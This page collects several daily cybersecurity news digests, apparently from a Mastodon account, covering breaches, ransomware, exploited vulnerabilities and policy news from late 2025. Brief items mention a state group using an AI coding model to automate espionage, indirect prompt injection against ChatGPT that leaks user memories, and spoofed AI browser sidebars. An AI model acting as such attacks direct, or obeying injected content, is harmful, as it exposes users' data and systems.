Lmst
Login

#ActiveExploitation

SOC Goulashsoc_goulash@infosec.exchange
2025-11-14

Alright, cyber pros! It's been a pretty active 24 hours, with a mix of new breach disclosures, some interesting ransomware developments, critical vulnerabilities under active attack, and a peek into how AI is shaping the threat landscape. Let's dive in:

Recent Cyber Attacks & Breaches 🚨

- DoorDash disclosed a data breach in October, impacting consumers, Dashers, and merchants. Personal information like names, addresses, phone numbers, and emails were accessed after an employee fell victim to a social engineering scam. This marks their third significant incident since 2019.
- The UK's National Health Service (NHS) is investigating claims by the Clop ransomware gang of a cyberattack. While Clop listed NHS.uk on its leak site, it hasn't specified which part of the organisation was breached or published any data, raising questions about the extent of their access.
- UK fintech firm Checkout.com was breached by ShinyHunters, who accessed a legacy cloud storage system with merchant data from 2020 and earlier. The company has publicly refused to pay the ransom, instead pledging to donate the amount to cybersecurity research at Carnegie Mellon and Oxford.
- A major Russian port operator, Port Alliance, reported ongoing disruptions from a cyberattack "from abroad," involving a DDoS and network breach. The attackers used a botnet of over 15,000 IPs, aiming to disrupt coal and fertiliser shipments, though core operations remained functional.
- The Lighthouse phishing kit, used for widespread "smishing" scams like fake road tolls, appears to have been disrupted following a lawsuit by Google. Researchers observed the kit's Telegram channels being taken down and associated domains no longer resolving.
- The FBI has warned of an aggressive health insurance scam targeting Chinese speakers in the US. Scammers spoof legitimate insurers, claim bogus surgery bills, and then, under the guise of Chinese law enforcement, threaten extradition or prosecution to extort payments and gain remote access to victims' computers.

πŸ€– Bleeping Computer | bleepingcomputer.com/news/secu
πŸ•΅πŸΌ The Register | go.theregister.com/feed/www.th
πŸ€– Bleeping Computer | bleepingcomputer.com/news/secu
πŸ—žοΈ The Record | therecord.media/cyberattack-on
🀫 CyberScoop | cyberscoop.com/lighthouse-text
πŸ•΅πŸΌ The Register | go.theregister.com/feed/www.th

New Threat Research: Ransomware, Malware & AI-Driven Attacks πŸ›‘οΈ

- Anthropic reported that Chinese state-sponsored group GTG-1002 used their Claude Code AI model to automate cyber espionage against 30 critical organisations, including tech, finance, and government. The AI allegedly handled vulnerability scanning, exploitation, and data exfiltration with minimal human oversight, though some researchers have expressed skepticism regarding the claimed level of AI autonomy.
- CISA and FBI issued an updated advisory on Akira ransomware, highlighting its new capability to encrypt Nutanix AHV virtual machines, expanding its targets beyond VMware ESXi and Hyper-V. The FBI ranks Akira as a "top five" ransomware threat, having extorted over $244 million from small- and medium-sized businesses, often exfiltrating data within two hours of initial access.
- The Kraken ransomware, a continuation of the HelloKitty operation, now features a system benchmarking capability. It tests target machines to determine optimal encryption speed, allowing it to choose between full or partial data encryption to maximise impact without triggering alerts due to excessive resource usage.
- A new self-spreading npm package, dubbed 'IndonesianFoods,' has flooded the registry with over 100,000 junk packages, spawning new ones every seven seconds. While currently non-malicious, it aims to stress the open-source ecosystem and may be financially motivated through abuse of the TEA Protocol.

πŸ•΅πŸΌ The Register | go.theregister.com/feed/www.th
πŸ€– Bleeping Computer | bleepingcomputer.com/news/secu
πŸ€– Bleeping Computer | bleepingcomputer.com/news/secu
🀫 CyberScoop | cyberscoop.com/akira-ransomwar
πŸ—žοΈ The Record | therecord.media/akira-gang-rec
πŸ€– Bleeping Computer | bleepingcomputer.com/news/secu
πŸ€– Bleeping Computer | bleepingcomputer.com/news/secu

Critical Vulnerabilities & Active Exploitation ⚠️

- A critical path traversal vulnerability (CVE-2025-64446) in Fortinet FortiWeb web application firewalls is under active, widespread exploitation. Attackers are using a publicly available PoC to create new administrative accounts on exposed devices without authentication. Fortinet silently patched this in version 8.0.2, and CISA has added it to its Known Exploited Vulnerabilities Catalog, urging immediate patching.
- ASUS has released firmware updates for several DSL series routers (DSL-AC51, DSL-N16, DSL-AC750) to fix a critical authentication bypass flaw (CVE-2025-59367). This vulnerability allows remote, unauthenticated attackers to gain full control. Users unable to update should disable internet-facing services like remote access, port forwarding, and VPN server.
- Researchers discovered critical Remote Code Execution (RCE) vulnerabilities in major AI inference engines from Meta (Llama), Nvidia (TensorRT-LLM), Microsoft (Sarathi-Serve), and open-source projects like vLLM and SGLang. These "ShadowMQ" flaws stem from insecure deserialization of data via ZeroMQ and Python's pickle module, often due to code reuse, potentially allowing arbitrary code execution.
- Kubernetes maintainers have decided to retire Ingress NGINX by March 2026 due to persistent security flaws and maintenance challenges. This popular ingress controller, found in around 6,000 implementations, has been problematic, with serious vulnerabilities allowing cluster takeover identified as recently as March 2025. Admins should plan migration to alternatives.

πŸ€– Bleeping Computer | bleepingcomputer.com/news/secu
πŸ•΅πŸΌ The Register | go.theregister.com/feed/www.th
πŸ€– Bleeping Computer | bleepingcomputer.com/news/secu
🚨 The Hacker News | thehackernews.com/2025/11/rese
πŸ•΅πŸΌ The Register | go.theregister.com/feed/www.th

Threat Landscape Commentary πŸ“ˆ

- The retail industry is facing a growing cybersecurity crisis, with breaches costing millions and eroding customer trust. The core issue isn't just about more technology, but a lack of executive-level cybersecurity leadership and a failure to treat cyber as a core strategic priority.
- The National Retail Federation (NRF) is urged to establish a dedicated cybersecurity talent incubator. This program would develop executive-ready leaders who understand both technical threats and the specific operational pressures retailers face, bridging the gap between academic expertise and industry needs.
- The initiative would offer six-month programs for graduates and modular training for junior roles, with placements across the NRF's network, aiming to foster a sector-wide mindset shift towards long-term strategic investment in cybersecurity talent.

🀫 CyberScoop | cyberscoop.com/retail-cybersec

Regulatory Issues & Data Privacy πŸ”’

- Google has backpedaled on its controversial Android developer verification rules following widespread backlash from users and developers. Originally intended to block malware from sideloaded apps, the revised rules will now offer options for limited app distribution without full verification and an "advanced flow" for power users to sideload unverified apps with warnings.
- The initial plan was criticised for potentially consolidating power and threatening open ecosystems like F-Droid.
- The revised verification process will open for early access in November 2025, with a phased global rollout of mandatory verification starting in September 2026 for specific regions.

πŸ€– Bleeping Computer | bleepingcomputer.com/news/goog

Government Actions Against Cybercrime πŸ›οΈ

- US federal authorities have established a new "Scam Center Strike Force" to combat Chinese cryptocurrency scam networks, often known as "pig butchering" or "romance baiting." These scams defraud Americans of nearly $10 billion annually, with operators often working from criminal compounds in Southeast Asia.
- The strike force focuses on tracing and seizing illicit crypto funds, already recovering over $401 million and initiating forfeiture for an additional $80 million. They also coordinate with international partners and have sanctioned groups and firms linked to these operations.
- A suspected Russian hacker, potentially Aleksey Lukashev (a GRU officer wanted by the FBI for 2016 US election interference), has been detained in Phuket, Thailand, at the request of the US. He faces possible extradition on cybercrime charges, with Thai police seizing laptops, phones, and digital wallets.
- The Justice Department announced five guilty pleas related to North Korea's long-running IT worker scam, which defrauded 136 US companies of $2.2 million and involved 18 stolen US identities. The DOJ also seized over $15 million in cryptocurrency from North Korean facilitators, linked to APT38 (Lazarus Group) and several major crypto thefts in 2023.

πŸ€– Bleeping Computer | bleepingcomputer.com/news/secu
πŸ—žοΈ The Record | therecord.media/russian-hacker
πŸ—žοΈ The Record | therecord.media/multiple-us-na

#CyberSecurity #ThreatIntelligence #Ransomware #Malware #Vulnerability #ActiveExploitation #ZeroDay #AI #NationState #DataBreach #Cybercrime #InfoSec #IncidentResponse #SupplyChainSecurity #CloudSecurity

SOC Goulashsoc_goulash@infosec.exchange
2025-11-05

Alright team, it's been a busy 24 hours in the cyber world! We've got updates on recent breaches, some interesting new threat actor TTPs, critical vulnerabilities under active exploitation, and a few policy shifts to keep an eye on. Let's dive in:

Recent Cyber Attacks and Breaches 🚨

- The University of Pennsylvania confirmed a data breach affecting development and alumni systems, with hackers stealing 1.71 GB of internal documents and 1.2 million donor records after a successful social engineering attack on an employee's SSO account.
- SonicWall's September security breach, which exposed customer firewall configuration backup files, has been attributed to a state-sponsored threat actor. The investigation confirmed no impact on SonicWall products, firmware, or source code, but customers were advised to reset credentials.
- International law enforcement, in "Operation Chargeback," dismantled three credit card fraud and money laundering networks that stole over €300 million from 4.3 million cardholders across 193 countries, exploiting German payment service providers to process fake online subscriptions.
- The Apache Software Foundation is disputing claims by the Akira ransomware gang that it breached OpenOffice and stole 23 GB of data, stating they do not possess the types of data claimed, and their investigation found no evidence of compromise.

πŸ€– Bleeping Computer | bleepingcomputer.com/news/secu
πŸ€– Bleeping Computer | bleepingcomputer.com/news/secu
πŸ€– Bleeping Computer | bleepingcomputer.com/news/secu
πŸ—žοΈ The Record | therecord.media/europe-police-
πŸ€– Bleeping Computer | bleepingcomputer.com/news/secu

New Threat Research on Actors, Malware, and TTPs πŸ•΅πŸΌ

- A new threat cluster, UNK_SmudgedSerpent, is targeting US academics and foreign policy experts with phishing attacks leveraging domestic political lures related to Iran, deploying legitimate RMM software like PDQ Connect, and mimicking Iranian cyber espionage groups like TA455 and TA453.
- Russia-linked Curly COMrades are innovating their cyber-espionage campaigns by hiding custom malware (CurlyShell and CurlCat) within lightweight Alpine Linux virtual machines running on Hyper-V, a tactic designed to bypass traditional endpoint detection tools.
- Google's Threat Intelligence Group (GTIG) reports a significant shift towards AI-powered malware, with new families like PromptFlux (a VBScript dropper using Gemini for obfuscation) and PromptSteal (a data miner) emerging, alongside various state-backed actors abusing LLMs for reconnaissance, malware development, and phishing.

πŸ“° The Hacker News | thehackernews.com/2025/11/myst
πŸ—žοΈ The Record | therecord.media/virtual-machin
πŸ€– Bleeping Computer | bleepingcomputer.com/news/secu
πŸ“° The Hacker News | thehackernews.com/2025/11/rese

Vulnerabilities and Active Exploitation ⚠️

- CISA has added two critical flaws to its KEV catalog due to active exploitation: CVE-2025-11371, a local file inclusion in Gladinet CentreStack/Triofox, and CVE-2025-48703, an unauthenticated RCE in Control Web Panel (CWP) via shell command injection. Federal agencies must patch by November 25th.
- Hackers are actively exploiting CVE-2025-11833, a critical 9.8-severity vulnerability in the Post SMTP WordPress plugin (affecting over 400,000 sites), allowing unauthenticated attackers to read email logs, including password reset messages, to hijack administrator accounts.
- OpenAI's ChatGPT has been found vulnerable to several indirect prompt injection techniques, including via trusted sites, search context, and conversation injection, which could lead to data leakage from user memories and chat histories.
- AMD is set to release microcode patches for CVE-2025-62626 (CVSS 7.2), a high-severity flaw in Zen 5 Epyc and Ryzen CPUs where the RDSEED function can return zero instead of a random number, potentially weakening cryptographic keys if an attacker has local privileges.

πŸ€– Bleeping Computer | bleepingcomputer.com/news/secu
πŸ“° The Hacker News | thehackernews.com/2025/11/cisa
πŸ€– Bleeping Computer | bleepingcomputer.com/news/secu
πŸ“° The Hacker News | thehackernews.com/2025/11/rese
πŸ•΅πŸΌ The Register | go.theregister.com/feed/www.th

Threat Landscape Commentary πŸ“‰

- The US federal cybersecurity posture is facing a "perfect storm" due to the F5 security breach (attributed to a nation-state actor), proposed CISA job and funding cuts, and the ongoing government shutdown, collectively eroding cyber readiness and creating an expanded attack surface.
- House GOP leaders are pushing the Commerce Department to investigate and restrict Chinese government-connected tech products across critical industries like AI, energy, and industrial control systems, citing China's view of information technology as a battlefield.
- Congressional leaders are also urging federal agencies to develop a clear strategy to compete with China in 6G telecommunications and secure US tech supply chains, learning from past mistakes that allowed Chinese companies to gain significant global influence in 5G.

🀫 CyberScoop | cyberscoop.com/us-cyber-readin
🀫 CyberScoop | cyberscoop.com/house-gop-leade
🀫 CyberScoop | cyberscoop.com/exclusive-china

Data Privacy Concerns πŸ”’

- The US Department of Homeland Security (DHS) is proposing a sweeping expansion of biometric data collection for immigration applications, including iris scans, voice prints, and DNA, from immigrants and even some US citizens associated with these cases, raising significant privacy concerns.

πŸ•΅πŸΌ The Register | go.theregister.com/feed/www.th

Regulatory Issues and Changes πŸ›οΈ

- The US Treasury Department has sanctioned two North Korean financial institutions and eight individuals for laundering over $12.7 million in cryptocurrency from cybercrime and fraudulent IT worker schemes, aiming to disrupt funding for Pyongyang's weapons programs.
- UK mobile carriers have committed to upgrading their networks within a year to block spoofed phone numbers, a key tactic used by scammers impersonating banks and government agencies, as part of a new Telecoms Charter to combat fraud.
- A House lawmaker predicts that Democratic support for the reauthorization of FISA Section 702, a key US national security surveillance power, will be a "heavier lift" in 2026 due to concerns over its use for warrantless searches of American data.

πŸ€– Bleeping Computer | bleepingcomputer.com/news/secu
πŸ“° The Hacker News | thehackernews.com/2025/11/us-s
πŸ€– Bleeping Computer | bleepingcomputer.com/news/secu
πŸ—žοΈ The Record | therecord.media/section-702-su

Other Noteworthy Updates πŸ’‘

- The UK's Department for Environment, Food & Rural Affairs (Defra) spent Β£312 million upgrading its IT estate, including replacing Windows 7 laptops with Windows 10, just as Windows 10 reached end-of-support, highlighting significant technical debt and potential future costs for extended security updates.
- Famed cryptographer and software engineer Daniel J. Bernstein (DJB) has given a favourable report on Fil-C, a new memory-safe C/C++ compiler based on Clang, noting its compatibility and ability to trap categories of C errors, despite performance drawbacks.
- Google's $32 billion acquisition of cloud security firm Wiz has received clearance from the US Department of Justice after an antitrust investigation, marking Google's largest-ever acquisition and a significant move to enhance Google Cloud's security offerings.

πŸ•΅πŸΌ The Register | go.theregister.com/feed/www.th
πŸ•΅πŸΌ The Register | go.theregister.com/feed/www.th
πŸ•΅πŸΌ The Register | go.theregister.com/feed/www.th

#CyberSecurity #ThreatIntelligence #Vulnerabilities #ActiveExploitation #RCE #Malware #Ransomware #NationState #APT #AI #DataPrivacy #Regulatory #InfoSec #CyberAttack #IncidentResponse #SupplyChainSecurity

SOC Goulashsoc_goulash@infosec.exchange
2025-10-23

Alright team, it's been a pretty packed 24 hours in the cyber world! We've got a mix of active nation-state campaigns, critical vulnerabilities under exploitation, some interesting cybercrime trends, and a few head-scratchers on the regulatory front. Let's dive in:

Recent Cyber Attacks & Breaches 🚨

- US Municipalities Under Attack: Several US local governments, including Kaufman County (TX) and La Vergne (TN), have suffered cyber incidents disrupting public services. This highlights the ongoing vulnerability of local government infrastructure, exacerbated by recent lapses in federal cybersecurity funding and support.
- Insider Threat at L3Harris: A former L3Harris Technologies executive is accused of stealing highly sensitive trade secrets from the company's cyber division and selling them to a Russian buyer for $1.3 million. This underscores the persistent and severe risk posed by insider threats, especially in defence and intelligence sectors.
- Starlink Used by Myanmar Fraudsters: SpaceX has proactively disabled over 2,500 Starlink terminals in Myanmar that were found to be powering human trafficking and cyber-fraud operations in lawless border zones. This move follows a military raid on a major scam compound and highlights the dual-use nature of advanced technologies and the challenges of preventing their misuse by criminal groups.

πŸ—žοΈ The Record | therecord.media/cyber-incident
🀫 CyberScoop | cyberscoop.com/ex-l3harris-exe
πŸ•΅πŸΌ The Register | go.theregister.com/feed/www.th

New Threat Research & Tradecraft πŸ›‘οΈ

- MuddyWater's Phoenix Backdoor: Iranian state-sponsored group MuddyWater (aka Static Kitten, Mercury, Seedworm) has been observed targeting over 100 government and international organisations in the Middle East and North Africa. They're using phishing emails with malicious Word documents (macros) to deploy the Phoenix v4 backdoor, which includes COM-based persistence and a custom browser infostealer. This marks a return to older macro-based techniques, suggesting a blend of old and new tradecraft.
- Jingle Thief's Cloud Gift Card Fraud: A financially motivated group, "Jingle Thief" (CL-CRI-1032, Atlas Lion, Storm-0539), is exploiting cloud infrastructure to steal millions in gift cards. They use phishing/smishing to gain initial access, then conduct extensive reconnaissance within compromised cloud environments, leveraging identity misuse rather than custom malware for stealth and persistence, often maintaining access for over a year.
- Lazarus Group Targets UAV Sector: North Korean Lazarus hackers are back with "Operation DreamJob," using fake recruitment lures to compromise three European defense companies involved in unmanned aerial vehicle (UAV) technology. The attack chain involves DLL sideloading via trojanised open-source applications, ultimately deploying the sophisticated ScoringMathTea RAT or BinMergeLoader.
- Smishing Triad's Massive Phishing Operation: Researchers have uncovered "Smishing Triad," a large-scale, Chinese-managed phishing campaign using text messages. It leverages ~195,000 malicious domains, impersonating a wide range of services from toll roads and postal services to financial institutions, with a focus on harvesting sensitive data for future attacks. The operation is highly modular and rapidly churns through infrastructure.
- YouTube Ghost Network Spreads Malware: Google and Check Point have dismantled a "YouTube Ghost Network" that spread password-stealing malware (Rhadamanthys, Lumma) through over 3,000 hijacked YouTube accounts. The campaign used fake tutorials for cracked software and game cheats, leveraging social credibility with fake comments and likes to trick users into disabling AV and downloading infostealers from cloud storage.

πŸ€– Bleeping Computer | bleepingcomputer.com/news/secu
πŸ—žοΈ The Record | therecord.media/iran-muddywate
πŸ“° The Hacker News | thehackernews.com/2025/10/jing
πŸ€– Bleeping Computer | bleepingcomputer.com/news/secu
🀫 CyberScoop | cyberscoop.com/unit-42-chinese
πŸ•΅πŸΌ The Register | go.theregister.com/feed/www.th

Actively Exploited Vulnerabilities & Mitigations ⚠️

- Adobe Commerce (Magento) Flaw Exploited: Threat actors are actively exploiting CVE-2025-54236 (CVSS 9.1), an improper input validation flaw in Adobe Commerce and Magento Open Source. This "SessionReaper" vulnerability allows account takeovers via the Commerce REST API, leading to PHP webshell deployment. A staggering 62% of Magento stores remain unpatched, making immediate action critical.
- Motex Lanscope Endpoint Manager Zero-Day: CISA has added CVE-2025-61932 (CVSS 9.3) in Motex Lanscope Endpoint Manager to its KEV catalog, confirming active exploitation as a zero-day. This critical flaw allows unauthenticated attackers to execute arbitrary code by sending specially crafted packets to vulnerable client programs and detection agents. Patching is the only solution, with a federal deadline of November 12, 2025.
- AI Browser Sidebar Spoofing: OpenAI's Atlas and Perplexity's Comet AI browsers are vulnerable to "AI Sidebar Spoofing" attacks. Researchers demonstrated how a malicious browser extension can inject JavaScript to create a fake, identical AI sidebar, tricking users into executing dangerous commands like crypto theft or reverse shell installations. Users should be cautious and limit sensitive activities on these browsers.
- Microsoft Blocks NTLM Theft via File Explorer: Microsoft has implemented a crucial security update, disabling File Explorer's preview pane for files downloaded from the internet (marked with Mark of the Web). This change, part of the October 2025 Patch Tuesday, prevents NTLM hash theft attacks that previously required no user interaction beyond selecting a malicious file for preview.

πŸ“° The Hacker News | thehackernews.com/2025/10/over
πŸ“° The Hacker News | thehackernews.com/2025/10/crit
πŸ€– Bleeping Computer | bleepingcomputer.com/news/secu
πŸ€– Bleeping Computer | bleepingcomputer.com/news/secu
πŸ€– Bleeping Computer | bleepingcomputer.com/news/micr

Threat Landscape Commentary 🌐

- CDM Program's Visibility Gaps: CISA's Continuous Diagnostics and Mitigation (CDM) program, despite significant investment, struggles with visibility into edge devices like F5 BIG-IP load balancers. This was highlighted by a recent F5 vulnerability, underscoring that CDM's traditional focus on internal networks leaves gaps for modern attack vectors like OT/IoT and cloud-native resources.
- Managed Identities Over Static Secrets: Organisations are increasingly moving away from static secrets (API keys, passwords) towards managed identities for machine authentication. This shift dramatically reduces credential management overhead and leakage risks, offering short-lived, auto-rotated credentials. While not a complete replacement for secret managers, it's a strategic move to reduce the "secret footprint" by 70-80%.

🀫 CyberScoop | cyberscoop.com/f5-vulnerabilit
πŸ“° The Hacker News | thehackernews.com/2025/10/why-

Regulatory & Legal Updates βš–οΈ

- UK Cyber Law Delays: British MPs are "deeply concerned" about ongoing delays to the UK's Cyber Security and Resilience Bill and proposed ransomware policies. These policies aim to ban ransomware payments for public sector/critical infrastructure and mandate reporting, but legislative inertia is seen as increasing national vulnerability.
- Polish Official Indicted for Spyware Purchase: Poland's former deputy justice minister, MichaΕ‚ WoΕ›, has been indicted for illegally diverting $6.9 million from a crime victim fund to purchase NSO Group's Pegasus spyware. This is part of a broader investigation into the controversial use of Pegasus against opposition politicians.
- NY DFS Updates Third-Party Risk Guidance with AI: The New York Department of Financial Services (DFS) has updated its third-party risk guidance for financial services, adding provisions for AI. While not imposing new requirements, it clarifies expectations for managing risks associated with vendors, particularly regarding AI model training and data handling, in light of increasing reliance on third-party cloud services.
- Trump Pardons Former Binance CEO: Former Binance CEO Changpeng Zhao (CZ) has received a presidential pardon from Donald Trump, following his guilty plea in 2023 for failing to report illicit cryptocurrency transactions. This controversial move, framed as ending the "war on cryptocurrency," raises questions about the future of Binance's compliance obligations and the broader regulatory landscape for crypto.

πŸ—žοΈ The Record | therecord.media/britain-cyber-
πŸ—žοΈ The Record | therecord.media/former-polish-
🀫 CyberScoop | cyberscoop.com/new-york-third-
πŸ—žοΈ The Record | therecord.media/changpeng-zhao

#CyberSecurity #ThreatIntelligence #Vulnerabilities #APT #Ransomware #Malware #ZeroDay #ActiveExploitation #Smishing #Phishing #CloudSecurity #ManagedIdentities #RegulatoryCompliance #Cybercrime #InfoSec #IncidentResponse

SOC Goulashsoc_goulash@infosec.exchange
2025-10-14

Alright team, it's been a packed 24 hours in the cyber world! We've got major updates on active exploitation, nation-state activity, a massive crypto seizure, and some serious data privacy concerns. Let's dive in:

Recent Cyber Attacks & Breaches ⚠️

- Japanese brewer Asahi confirmed its September cyberattack was ransomware (Qilin group) and personal information may have been exfiltrated.
- Qilin claims 27GB of data, including employee records, causing significant disruption to Asahi's logistics and delaying financial results.
- This incident, alongside a UK NCSC report, highlights a sharp rise in ransomware and data theft attacks globally.
πŸ•΅πŸΌ The Register | go.theregister.com/feed/www.th

Qantas Customer Data Leaked by Scattered LAPSUS$ Hunters ✈️

- Australian airline Qantas confirmed the Scattered LAPSUS$ Hunters group released customer data stolen in a July cyberattack via a third-party Salesforce platform.
- Data for 5.7 million people was affected, including names, emails, and frequent flyer numbers, though no credit card or passport details were compromised.
- Salesforce refused to pay the ransom, leading to the data release, and while the FBI took down initial leak domains, the hackers quickly established new platforms.
πŸ—žοΈ The Record | therecord.media/qantas-cybercr

Michigan City Falls Victim to Obscura Ransomware πŸ™οΈ

- Michigan City, Indiana, confirmed a September "network disruption" was a ransomware attack by the Obscura gang, impacting government systems and data.
- Obscura claims to have stolen 450GB of data and has since published it after the ransom deadline expired.
- This incident adds to a growing list of municipalities targeted by ransomware, highlighting the critical need for robust incident response and recovery plans.
πŸ—žοΈ The Record | therecord.media/michigan-india

Massive Crypto Seizure in "Pig Butchering" Scam Crackdown πŸ’°

- US authorities, in coordination with the UK, seized an unprecedented $15 billion in Bitcoin from Chen Zhi, chairman of Cambodia's Prince Group, for operating a vast "pig butchering" crypto investment fraud network.
- The criminal enterprise involved human trafficking, forced labour in scam compounds, and sophisticated money laundering techniques across over 30 countries.
- This marks the largest financial seizure in Justice Department history and a significant blow against transnational cybercrime operations in Southeast Asia.
🀫 CyberScoop | cyberscoop.com/southeast-asia-
πŸ€– Bleeping Computer | bleepingcomputer.com/news/secu
πŸ—žοΈ The Record | therecord.media/feds-sanction-

New Threat Research & Tradecraft πŸ›‘οΈ

Malicious Packages Weaponise Discord for C2 πŸ“¦

- Researchers found malicious npm, PyPI, and RubyGems packages (e.g., mysql-dumpdiscord, sqlcommenter_rails) using Discord webhooks as command-and-control (C2) channels.
- These packages exfiltrate sensitive developer data like config files, API keys, and host details, leveraging Discord's free and fast webhooks to avoid hosting infrastructure and blend with normal traffic.
- North Korean threat actors, part of the "Contagious Interview" campaign, also deployed over 300 malicious npm packages, often typosquatting legitimate ones, to deliver malware like HexEval and BeaverTail to Web3 and crypto developers.
🌐 The Hacker News | thehackernews.com/2025/10/npm-

Flax Typhoon Abuses ArcGIS for Year-Long Persistence πŸ—ΊοΈ

- The Chinese state-sponsored APT group Flax Typhoon (aka Ethereal Panda, RedJuliett) maintained undetected persistence for over a year by weaponising a Java Server Object Extension (SOE) in the ArcGIS geo-mapping tool.
- Attackers used valid administrator credentials to upload a malicious SOE acting as a web shell, then installed SoftEther VPN Bridge as a Windows service for covert C2 and lateral movement.
- This novel technique highlights how sophisticated actors "live off the land" by manipulating legitimate software components to evade detection and establish deep, long-term access.
πŸ€– Bleeping Computer | bleepingcomputer.com/news/secu
🌐 The Hacker News | thehackernews.com/2025/10/chin

Vulnerabilities & Active Exploitation 🚨

Fortra GoAnywhere MFT Zero-Day Actively Exploited ⚠️

- Fortra confirmed active exploitation of CVE-2025-10035, a maximum-severity flaw in its GoAnywhere MFT service, with Microsoft linking it to the Storm-1175 ransomware group.
- The vulnerability allows unauthorised activity, but researchers are still questioning how attackers obtained a private key seemingly required for exploitation, highlighting a transparency gap.
- CISA has added this to its Known Exploited Vulnerabilities Catalog, urging immediate patching for both cloud and on-premises deployments.
🀫 CyberScoop | cyberscoop.com/fortra-goanywhe

Microsoft Edge IE Mode Zero-Day Under Attack 🌐

- Microsoft is restricting Internet Explorer mode in Edge after discovering active exploitation of an unpatched zero-day in the Chakra JavaScript engine.
- Attackers use social engineering to direct targets to spoofed websites, prompting them to load pages in IE mode, then exploit the Chakra flaw for remote code execution and privilege escalation.
- Users should be cautious of prompts to activate IE mode, and enterprise users should ensure policies are in place to limit its use to only necessary, trusted sites.
πŸ€– Bleeping Computer | bleepingcomputer.com/news/secu

Oracle E-Business Suite Hit by Multiple Zero-Days πŸ”“

- Oracle has rushed out another emergency patch for CVE-2025-61884 (CVSS 7.5) in its E-Business Suite (EBS) Runtime UI, a remotely exploitable flaw allowing unauthenticated access to sensitive resources.
- This follows a previous zero-day (CVE-2025-61882) exploited by the Clop ransomware group, with a PoC for CVE-2025-61884 publicly leaked by ShinyHunters.
- Oracle's disclosure around these EBS vulnerabilities has been criticised for lack of clarity, with multiple exploit chains observed and IOCs not always aligning with patches, making it crucial for admins to apply all available updates immediately.
πŸ•΅πŸΌ The Register | go.theregister.com/feed/www.th
πŸ€– Bleeping Computer | bleepingcomputer.com/news/secu

AMD RMPocalypse Threatens Confidential Computing πŸ’»

- AMD has released fixes for "RMPocalypse" (CVE-2025-0033, CVSS 5.9), a race condition in EPYC processors' SEV-SNP confidential computing that allows a malicious hypervisor to manipulate the Reverse Map Paging (RMP) table.
- A single 8-byte write to the RMP can lead to a full breach of confidentiality and integrity for confidential virtual machines (CVMs), enabling arbitrary tampering and secret exfiltration.
- Affected EPYC 7003, 8004, 9004, and 9005 series processors require BIOS updates, with some embedded versions still awaiting fixes.
🌐 The Hacker News | thehackernews.com/2025/10/rmpo

Android "Pixnapping" Steals 2FA Codes Pixel-by-Pixel πŸ“±

- A new side-channel attack, "Pixnapping" (CVE-2025-48561, CVSS 5.5), affects Google and Samsung Android devices (versions 13-16), allowing rogue apps to steal sensitive data like 2FA codes without permissions.
- The attack combines the GPU.zip side-channel with Android's window blur API to covertly extract pixels from other apps, including secure communication tools like Signal and Google Authenticator, in under 30 seconds for 2FA codes.
- While Google issued a patch in September, a bypass was found, and a more robust fix is expected in December 2025; an app list bypass remains unpatched.
🌐 The Hacker News | thehackernews.com/2025/10/new-
πŸ€– Bleeping Computer | bleepingcomputer.com/news/secu

Secure Boot Bypass on Linux Framework Systems 🐧

- Approximately 200,000 Linux Framework laptops were shipped with signed UEFI shells containing a 'memory modify' (mm) command, which can be exploited to bypass Secure Boot protections.
- This command allows direct read/write access to system memory, enabling attackers to disable signature verification and load persistent bootkits that evade OS-level controls.
- Framework is rolling out firmware updates (BIOS/DBX) to address this oversight, and users are urged to apply patches or implement physical access prevention as a temporary mitigation.
πŸ€– Bleeping Computer | bleepingcomputer.com/news/secu

Microsoft's October Patch Tuesday: 6 Zero-Days, 172 Flaws 🩹

- Microsoft's October Patch Tuesday addressed 172 vulnerabilities, including six zero-days, making it the largest assortment of defects disclosed this year.
- Two actively exploited zero-days are CVE-2025-24990 (Windows Agere Modem Driver Elevation of Privilege) and CVE-2025-59230 (Windows Remote Access Connection Manager Elevation of Privilege), both added to CISA's KEV catalog.
- Other notable fixes include CVE-2025-0033 (AMD RMPocalypse) and CVE-2025-47827 (IGEL OS Secure Boot bypass), with Windows 10 reaching its end of free support.
πŸ€– Bleeping Computer | bleepingcomputer.com/news/micr
🀫 CyberScoop | cyberscoop.com/microsoft-patch

Threat Landscape Commentary 🌍

UK Cyberattacks Reach Record High πŸ“ˆ

- The UK's NCSC reported a record 204 "nationally significant" cyberattacks between September 2024 and August 2025, more than double the previous year, with 18 being "highly significant."
- This surge in sophisticated and frequent hostile cyber activity, exemplified by incidents like the Jaguar Land Rover disruption, poses a direct threat to the UK's economic security.
- The government is urging CEOs and board chairs of leading businesses to take concrete actions and make cyber resilience a top-level responsibility.
πŸ—žοΈ The Record | therecord.media/uk-hit-by-reco

Taiwan Reports Surge in Chinese Cyber & Disinformation Campaigns πŸ‡¨πŸ‡³

- Taiwan's National Security Bureau (NSB) warns of a significant increase in Chinese cyberattacks and online disinformation, with government networks facing 2.8 million intrusions daily (17% increase).
- These state-level operations, involving the PLA and other agencies, target critical infrastructure and use "online troll armies" and AI-generated content to erode public trust and sow division ahead of 2026 elections.
- The campaign aims to promote pro-China narratives and undermine trust in the US, highlighting the integrated nature of cyber espionage and information warfare.
πŸ—žοΈ The Record | therecord.media/taiwan-nsb-rep

#CyberSecurity #ThreatIntelligence #Ransomware #ZeroDay #Vulnerability #ActiveExploitation #APT #NationState #DataBreach #Privacy #PatchTuesday #SupplyChainAttack #Malware #CTEM #Infosec

SOC Goulashsoc_goulash@infosec.exchange
2025-09-30

Morning, cyber pros! β˜• It's been a packed 24 hours with some serious breaches, actively exploited vulnerabilities, and significant regulatory shifts. We're also seeing new threat actor TTPs and a massive crypto bust. Let's dive in:

Airline and Beverage Giant Hit by Cyberattacks ⚠️

- Canadian airline WestJet confirmed a June cyberattack exposed sensitive customer data, including full names, dates of birth, mailing addresses, and travel documents like passports and government IDs. No credit card or password data was compromised.
- Japanese beverage company Asahi experienced a cyberattack causing system failures that halted order, shipment, and call centre operations in Japan, though no personal or customer data leakage has been confirmed.
- These incidents highlight the ongoing vulnerability of major corporations to cyber threats, with WestJet's breach potentially linked to the Scattered Spider group, known for targeting aviation.

πŸ€– Bleeping Computer | bleepingcomputer.com/news/secu
πŸ—žοΈ The Record | therecord.media/asahi-japan-cy

New Chinese Espionage Group "Phantom Taurus" Emerges πŸ‡¨πŸ‡³

- Palo Alto Networks' Unit 42 has identified a new, highly stealthy Chinese espionage group, "Phantom Taurus," targeting geopolitically significant victims in the Middle East, Africa, and Asia.
- This group uses a distinct set of custom malware, including the NET-STAR suite of web-based backdoors, designed for extreme stealth and long-term persistence to exfiltrate sensitive data.
